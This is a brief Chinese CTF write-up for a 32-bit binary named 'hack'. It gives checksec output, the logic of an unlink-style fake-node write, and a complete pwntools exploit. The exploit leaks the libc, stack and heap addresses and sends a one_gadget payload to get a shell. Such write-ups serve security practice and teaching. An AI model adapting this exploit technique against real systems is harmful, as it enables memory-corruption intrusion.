基础太差… tcl
不知道啥比赛的题…上课上完有个朋友给我发了题…初看挺简单…后来看了群里师傅的思路才做出来.. 曲线救国曲线救国。。。 附件
X86的程序题目意图很明显考察利用思路…
➜ Desktop checksec hack
[*] '/home/n132/Desktop/hack'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
直接允许泄露栈地址,堆地址,libc基址 最后的部分考察利用
P1 = fake_node->pre;
P2 = fake_node->next;
P1->next = P2;
P2->pre = P1;
其中fake_node完全可控
8048702: c9 leave
8048703: 8d 61 fc lea -0x4(%ecx),%esp
8048706: c3 ret
EXP
from pwn import *
#context.log_level = 'debug'
p = process("./hack")
elf = ELF("./hack")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")
p.recvuntil("input address: \n")
p.sendline("134520860")
p.recvuntil("0x")
addr = int(p.recvuntil("\n",drop=True),16)
print hex(addr)
libc_base = addr - libc.symbols['puts']
environ_addr = libc_base+libc.symbols['_environ']
p.recvuntil("Second chance: \n")
p.sendline(str(environ_addr))
p.recvuntil("0x")
stack_addr = int(p.recvuntil("\n",drop=True),16)-(0xffffdef0-4-0xfffdd000)
ret_addr = stack_addr+0xffffd05c-0x804b000
p.recvuntil("node is ")
heap=int(p.readuntil(",")[:-1],16)-0x20
log.info(hex(libc_base))
log.info(hex(stack_addr))
log.info(hex(heap))
#gdb.attach(p,'b *0x8048706')
libc.address=libc_base
payload = p32(0x3ac69+libc_base)+p32(0)+p32(0xffffd054-12+stack_addr-0xfffdc220)+p32(heap+0x24)
p.sendafter("now: ",payload)
p.interactive("nier>>>>")